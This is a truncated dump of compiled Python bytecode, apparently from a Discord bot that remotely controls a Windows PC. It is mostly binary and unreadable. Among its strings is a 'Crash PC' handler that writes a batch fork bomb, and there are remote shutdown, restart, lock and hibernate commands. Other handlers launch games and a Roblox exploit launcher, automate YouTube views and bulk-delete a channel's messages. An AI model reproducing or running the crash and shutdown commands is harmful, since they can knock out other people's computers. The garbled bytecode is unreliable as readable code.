Usagez\x10Available Memoryr\x10\x00\x00\x00Z\x04Diskr\x17\x00\x00\x00r\xcc\x00\x00\x00)\rr\x1a\x00\x00\x00r\xbf\x00\x00\x00Z\tadd_fieldrB\x00\x00\x00r\xa0\x00\x00\x00Z\x0bcpu_percentZ\x0evirtual_memoryr\xa5\x00\x00\x00Z\tavailabler\xa4\x00\x00\x00r\xa8\x00\x00\x00r\x1c\x00\x00\x00r#\x00\x00\x00)\x04r\xb8\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00r\xbf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02b1o\x01\x00\x00s\x12\x00\x00\x00\x02\x80\x02\x02\x0e\x01 \x01 \x01*\x01\x12\x01&\x01\x1c\x01z\x0bmysystem.b1z\x08Crash Pcc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe7\x00\x00\x00)\x04Nz\x17:crash\nstart\ngoto crashr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xde\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02s1y\x01\x00\x00\xf3\x06\x00\x00\x00\x02\x80"\x02\x1c\x01z\x0bmysystem.s1\xda\x04Lockc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe7\x00\x00\x00)\x04Nz\x0bSHUTDOWN /lr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xde\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02s2}\x01\x00\x00r\xf7\x00\x00\x00z\x0bmysystem.s2Z\x07Restartc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe7\x00\x00\x00)\x04Nz\x11SHUTDOWN -r -t 10r\xca\x00\x00\x00r\xcc\x00\x00\x00r\xde\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02s3\x81\x01\x00\x00r\xf7\x00\x00\x00z\x0bmysystem.s3Z\tHibernatec\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe7\x00\x00\x00)\x04Nz\x0bSHUTDOWN /hr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xde\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02s4\x85\x01\x00\x00r\xf7\x00\x00\x00z\x0bmysystem.s4Z\x08Shutdownc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xeb\x00\x00\x00r\xec\x00\x00\x00)\x04rJ\x00\x00\x00r\xed\x00\x00\x00r\xd2\x00\x00\x00r\x1c\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02s5\x89\x01\x00\x00r\xee\x00\x00\x00z\x0bmysystem.s5)\x12r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xdc\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00r\xef\x00\x00\x00r\xc6\x00\x00\x00r\xf5\x00\x00\x00r\xf6\x00\x00\x00r\xf9\x00\x00\x00r\xfa\x00\x00\x00r\xfb\x00\x00\x00r\xfc\x00\x00\x00r\xc7\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r\xf1\x00\x00\x00m\x01\x00\x00s\x1c\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\t\x18\x01\x14\x03\x18\x01\x14\x03\x18\x01\x14\x03\x18\x01\x14\x03 \x01r\xf1\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s\xf8\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x04d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x08d\t\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\ne\x04j\x07j\x0cd\x0bd\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x0cd\r\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x0ee\x04j\x07j\x08d\x0ed\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x0fd\x10\x84\x04\x83\x01Z\x0ee\x04j\x05j\x06d\x11e\x04j\x07j\x0fd\x11d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x12d\x13\x84\x04\x83\x01Z\x10e\x04j\x05j\x06d\x14e\x04j\x07j\x11d\x14d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x15d\x16\x84\x04\x83\x01Z\x12\x87\x00\x04\x00Z\x13S\x00)\x17\xda\x07openappc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd8\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00\x8e\x01\x00\x00r\xf2\x00\x00\x00z\x10openapp.__init__r\xd9\x00\x00\x00Z\x05game1r\xdb\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sH\x00\x00\x00\x81\x01z\x14t\x00\xa0\x01t\x02\x83\x00d\x01d\x02g\x03\xa1\x01\x01\x00|\x02\xa0\x03d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x03d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nz\x19--launch-product=valorantz\x17--launch-patchline=liver\xca\x00\x00\x00r\xcc\x00\x00\x00)\x04\xda\nsubprocess\xda\x05Popenr\x82\x00\x00\x00r\x1c\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x04app1\x8f\x01\x00\x00\xf3\x06\x00\x00\x00\x02\x80*\x02\x1c\x01z\x0copenapp.app1r\xe1\x00\x00\x00Z\x05game2c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x04\x00\x00\x00\x83\x00\x00\x00s\xd8\x00\x00\x00\x81\x01t\x00j\x01d\x01d\x02\x8d\x01}\x03t\x02\xa0\x03d\x03\xa1\x01j\x04\xa0\x05d\x04\xa1\x01}\x04t\x06\xa0\x07d\x05\xa1\x01d\x06\x17\x00|\x04\x17\x00\x89\x00d\x07t\x00j\x08f\x02d\x08d\t\x84\x04}\x05d\x07t\x00j\x08f\x02\x87\x00f\x01d\nd\x0b\x84\x0c}\x06d\x07t\x00j\x08f\x02d\x0cd\r\x84\x04}\x07d\x07t\x00j\x08f\x02d\x0ed\x0f\x84\x04}\x08|\x05t\t_\n|\x06t\x0b_\n|\x07t\x0c_\n|\x08t\r_\nt\x00j\x0e\xa0\x0f\xa1\x00}\t|\t\xa0\x10t\t\xa1\x01\x01\x00|\t\xa0\x10t\x0b\xa1\x01\x01\x00|\t\xa0\x10t\x0c\xa1\x01\x01\x00|\t\xa0\x10t\r\xa1\x01\x01\x00|\x02j\x11|\x03|\td\x10\x8d\x02I\x00d\x00H\x00}\nd\x00S\x00)\x11Nu7\x00\x00\x00\xe0\xb9\x80\xe0\xb8\xa5\xe0\xb8\xb7\xe0\xb8\xad\xe0\xb8\x81\xe0\xb8\xa7\xe0\xb8\xb4\xe0\xb8\x98\xe0\xb8\xb5\xe0\xb8\x81\xe0\xb8\xb2\xe0\xb8\xa3\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 Robloxr\x12\x00\x00\x00z#http://setup.roblox.com/version.txt\xda\x05asciiZ\x0cLOCALAPPDATAz\x11\\Roblox\\Versions\\r\xbc\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xd3\x00\x00\x00s\x1e\x00\x00\x00\x81\x01t\x00t\x01\x83\x01\x01\x00|\x00\xa0\x02d\x01\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x02Nr\xca\x00\x00\x00)\x03re\x00\x00\x00rd\x00\x00\x00r\x1c\x00\x00\x00\xa9\x01r\xbc\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bg1_callback\x98\x01\x00\x00s\x04\x00\x00\x00\x02\x80\x1c\x00z!openapp.app2.<locals>.g1_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x93\x00\x00\x00sL\x00\x00\x00\x81\x01z\x16t\x00\xa0\x01\x9d\x00\x88\x00\x17\x00d\x01\x17\x00d\x02g\x02\xa1\x01\x01\x00|\x00\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x02d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nz\x19\\RobloxPlayerLauncher.exez\x04-appr\xca\x00\x00\x00r\xcc\x00\x00\x00\xa9\x03r\xfe\x00\x00\x00r\xff\x00\x00\x00r\x1c\x00\x00\x00r\x03\x01\x00\x00\xa9\x01r:\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bg2_callback\x99\x01\x00\x00s\x06\x00\x00\x00\x02\x80.\x01\x1c\x01z!openapp.app2.<locals>.g2_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00s@\x00\x00\x00\x81\x01z\x10t\x00\xa0\x01d\x01\xa1\x01\x01\x00|\x00\xa0\x02d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nz\x17https://web.roblox.com/r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x03rb\x00\x00\x00rc\x00\x00\x00r\x1c\x00\x00\x00r\x03\x01\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bg3_callback\x9c\x01\x00\x00s\x06\x00\x00\x00\x02\x80"\x01\x1c\x01z!openapp.app2.<locals>.g3_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\xd3\x00\x00\x00sd\x00\x00\x00\x81\x01t\x00j\x01\xa0\x02\xa1\x00}\x01d\x01t\x00j\x03f\x02d\x02d\x03\x84\x04}\x02d\x01t\x00j\x03f\x02d\x04d\x05\x84\x04}\x03|\x02t\x04_\x05|\x03t\x06_\x05|\x01\xa0\x07t\x04\xa1\x01\x01\x00|\x01\xa0\x07t\x06\xa1\x01\x01\x00|\x00j\x08t\t|\x01d\x06\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\x07Nr\xbc\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00s:\x00\x00\x00\x81\x01z\rd\x01a\x00t\x01j\x02t\x03d\x02\x8d\x01\xa0\x04\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x05d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04NTr\x95\x00\x00\x00r\xcc\x00\x00\x00)\x06ri\x00\x00\x00r\x98\x00\x00\x00r\x99\x00\x00\x00r\xab\x00\x00\x00r\x9a\x00\x00\x00r\x1c\x00\x00\x00r\x03\x01\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0baw_callback\xa1\x01\x00\x00s\x06\x00\x00\x00\x02\x80\x1c\x01\x1c\x01z6openapp.app2.<locals>.g4_callback.<locals>.aw_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00s*\x00\x00\x00\x81\x01z\x05d\x01a\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x01d\x02\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x03NFr\xcc\x00\x00\x00)\x02ri\x00\x00\x00r\x1c\x00\x00\x00r\x03\x01\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bda_callback\xa4\x01\x00\x00s\x06\x00\x00\x00\x02\x80\x0c\x01\x1c\x01z6openapp.app2.<locals>.g4_callback.<locals>.da_callback\xa9\x02r\x18\x00\x00\x00\xda\x04view)\nr\x1a\x00\x00\x00r\xb4\x00\x00\x00\xda\x04Viewr\xc6\x00\x00\x00\xda\x02onr\xc1\x00\x00\x00\xda\x03offr\xb6\x00\x00\x00r\x1c\x00\x00\x00\xda\x06aa1211)\x04r\xbc\x00\x00\x00Z\x05asdawr\t\x01\x00\x00r\n\x01\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bg4_callback\x9f\x01\x00\x00s\n\x00\x00\x00\x02\x80\n\x01\x10\x01\x10\x038\x03z!openapp.app2.<locals>.g4_callbackr\x0b\x01\x00\x00)\x12r\x1a\x00\x00\x00r\xbf\x00\x00\x00rC\x00\x00\x00r\x84\x00\x00\x00r5\x00\x00\x00\xda\x06decoder8\x00\x00\x00\xda\x06getenvr\xc6\x00\x00\x00\xda\x02g1r\xc1\x00\x00\x00\xda\x02g2\xda\x02g3\xda\x02g4r\xb4\x00\x00\x00r\r\x01\x00\x00r\xb6\x00\x00\x00r\x1c\x00\x00\x00)\x0br\xb8\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00r\x18\x00\x00\x00\xda\x07versionr\x04\x01\x00\x00r\x07\x01\x00\x00r\x08\x01\x00\x00r\x11\x01\x00\x00\xda\x06myview\xda\x03msgr"\x00\x00\x00r\x06\x01\x00\x00r\x0f\x00\x00\x00\xda\x04app2\x93\x01\x00\x00s$\x00\x00\x00\x02\x80\x0c\x02\x12\x01\x12\x01\x10\x01\x14\x01\x10\x03\x10\x03\x06\t\x06\x01\x06\x01\x06\x01\n\x01\n\x01\n\x01\n\x01\n\x01\x18\x01z\x0copenapp.app2r\xe3\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00\xf3H\x00\x00\x00\x81\x01z\x14t\x00\xa0\x01t\x02\x9b\x00d\x01\x9d\x02g\x01\xa1\x01\x01\x00|\x02\xa0\x03d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x03d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nz\x15/Synapse Launcher.exer\xca\x00\x00\x00r\xcc\x00\x00\x00)\x04r\xfe\x00\x00\x00r\xff\x00\x00\x00rT\x00\x00\x00r\x1c\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x04app3\xb2\x01\x00\x00r\x01\x01\x00\x00z\x0copenapp.app3r\xe5\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sB\x00\x00\x00\x81\x01z\x11t\x00\xa0\x01d\x01g\x01\xa1\x01\x01\x00|\x02\xa0\x02d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nz\x19./lib/Multiple_ROBLOX.exer\xca\x00\x00\x00r\xcc\x00\x00\x00r\x05\x01\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x04app4\xb6\x01\x00\x00s\x06\x00\x00\x00\x02\x80$\x02\x1c\x01z\x0copenapp.app4r\xe8\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\x1c\x01\x00\x00)\x04Nz\x19/.minecraft/TLauncher.exer\xca\x00\x00\x00r\xcc\x00\x00\x00)\x04r\xfe\x00\x00\x00r\xff\x00\x00\x00\xda\x0bappdata_dirr\x1c\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x04app5\xba\x01\x00\x00r\x01\x01\x00\x00z\x0copenapp.app5)\x14r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xdc\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00r\xef\x00\x00\x00r\xc6\x00\x00\x00r\x00\x01\x00\x00r\xf0\x00\x00\x00r\x1b\x01\x00\x00r\x1d\x01\x00\x00\xda\x07blurpler\x1e\x01\x00\x00r-\x00\x00\x00r \x01\x00\x00r\xc7\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r\xfd\x00\x00\x00\x8d\x01\x00\x00s\x18\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x03\x18\x01\x14\x1e\x18\x01\x14\x03\x18\x01\x14\x03 \x01r\xfd\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\xf3t\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x08d\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\x0c\x87\x00\x04\x00Z\rS\x00)\x0c\xda\tdSettingsc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd8\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00\xbf\x01\x00\x00r\xf2\x00\x00\x00z\x12dSettings.__init__z\rclose Consoler\xdb\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s^\x00\x00\x00\x81\x01z\x1ft\x00\xa0\x01t\x00j\x02d\x01k\x02r\x0bd\x02n\x01d\x03\xa1\x01\x01\x00t\x03d\x04t\x04j\x05\x9b\x00\x9d\x02\x83\x01\x01\x00|\x02\xa0\x06d\x05\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x06d\x06\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x07Nr\x9e\x00\x00\x00\xda\x03cls\xda\x05clear\xfa\x0bBOT NAME : r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x07r8\x00\x00\x00r\xaa\x00\x00\x00r%\x00\x00\x00r\x1e\x00\x00\x00\xda\x03bot\xda\x04userr\x1c\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bSettingsaa2\xc0\x01\x00\x00s\x06\x00\x00\x00\x02\x80@\x02\x1c\x01z\x15dSettings.Settingsaa2r \x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s^\x00\x00\x00\x81\x01|\x02j\x00t\x01j\x02d\x01d\x02\x8d\x01d\x03\x8d\x01I\x00d\x00H\x00\x01\x00t\x03\xa0\x04t\x05\xa1\x01}\x03|\x03j\x06d\x00d\x04\x8d\x012\x00z\r3\x00d\x00H\x00W\x00}\x04|\x04\xa0\x07\xa1\x00I\x00d\x00H\x00\x01\x00q\x196\x00d\x05a\x08t\t\x83\x00\x01\x00d\x00S\x00)\x06Nz\x07quit...r\x12\x00\x00\x00r\x17\x00\x00\x00\xa9\x01\xda\x05limitF)\nr\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r\'\x01\x00\x00\xda\x0bget_channel\xda\tchannelid\xda\x07history\xda\x06delete\xda\x04yyttr \x00\x00\x00\xa9\x05r\xb8\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00\xda\x07channel\xda\x07messager"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\nSettings22\xc4\x01\x00\x00s\n\x00\x00\x00\x02\x80\x1a\x02\n\x01*\x01\x0e\x01z\x14dSettings.Settings22)\x0er\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xdc\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00r\xef\x00\x00\x00r\xc6\x00\x00\x00r)\x01\x00\x00r4\x01\x00\x00r\xc7\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r#\x01\x00\x00\xbe\x01\x00\x00s\x0c\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x03 \x01r#\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s\xa0\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x08d\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\x0ce\x04j\x05j\x06d\x0ce\x04j\x07j\rd\x0cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\rd\x0e\x84\x04\x83\x01Z\x0e\x87\x00\x04\x00Z\x0fS\x00)\x0f\xda\tsseleniumc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd8\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00\xcb\x01\x00\x00r\xf2\x00\x00\x00z\x12sselenium.__init__r\xe1\x00\x00\x00r\xdb\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sF\x00\x00\x00\x81\x01z\x13|\x02\xa0\x00d\x01\xa1\x01I\x00d\x00H\x00\x01\x00t\x01j\x02t\x03d\x02\x8d\x01\xa0\x04\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x00d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nr\xca\x00\x00\x00r\x95\x00\x00\x00r\xcc\x00\x00\x00)\x05r\x1c\x00\x00\x00r\x98\x00\x00\x00r\x99\x00\x00\x00r\x91\x00\x00\x00r\x9a\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\nsselenium1\xcc\x01\x00\x00s\x06\x00\x00\x00\x02\x80(\x02\x1c\x01z\x14sselenium.sselenium1z\x0cyoutube viewc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xeb\x00\x00\x00r\xec\x00\x00\x00)\x04rJ\x00\x00\x00r\xed\x00\x00\x00r\xc9\x00\x00\x00r\x1c\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\nsselenium2\xd0\x01\x00\x00s\n\x00\x00\x00\x02\x80\x02\x02\x1a\x01\x06\x01\x16\x01z\x14sselenium.sselenium2z\rquit seleniumc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s>\x00\x00\x00\x81\x01z\x0ft\x00\xa0\x01\xa1\x00\x01\x00|\x02\xa0\x02d\x01\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x02d\x02\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x03Nr\xca\x00\x00\x00r\xcc\x00\x00\x00)\x03r\x8b\x00\x00\x00r \x00\x00\x00r\x1c\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0cquitselenium\xd6\x01\x00\x00s\x0c\x00\x00\x00\x02\x80\x02\x03\x08\x01\x16\x01\x06\x01\x16\x01z\x16sselenium.quitselenium)\x10r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xdc\x00\x00\x00r,\x00\x00\x00r-\x00\x00\x00r\xef\x00\x00\x00r\xc6\x00\x00\x00r6\x01\x00\x00r7\x01\x00\x00r.\x00\x00\x00r8\x01\x00\x00r\xc7\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r5\x01\x00\x00\xca\x01\x00\x00s\x10\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x03\x18\x01\x14\x05 \x01r5\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00r"\x01\x00\x00)\x0c\xda\x03outc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd8\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00\xdf\x01\x00\x00r\xf2\x00\x00\x00z\x0cout.__init__z\x12no youube time outr\xdb\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00sl\x00\x00\x00\x81\x01d\x01t\x00j\x01f\x02d\x02d\x03\x84\x04}\x03d\x01t\x00j\x01f\x02d\x04d\x05\x84\x04}\x04|\x03t\x02_\x03|\x04t\x04_\x03t\x00j\x05\xa0\x06\xa1\x00}\x05|\x05\xa0\x07t\x02\xa1\x01\x01\x00|\x05\xa0\x07t\x04\xa1\x01\x01\x00|\x02j\x08t\x00j\td\x06d\x07\x8d\x01|\x05d\x08\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\tNr\xbc\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00sR\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x15d\x02a\x01t\x02j\x03t\x04d\x03\x8d\x01\xa0\x05\xa1\x00\x01\x00|\x00\xa0\x06d\x04\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x06d\x05\xa1\x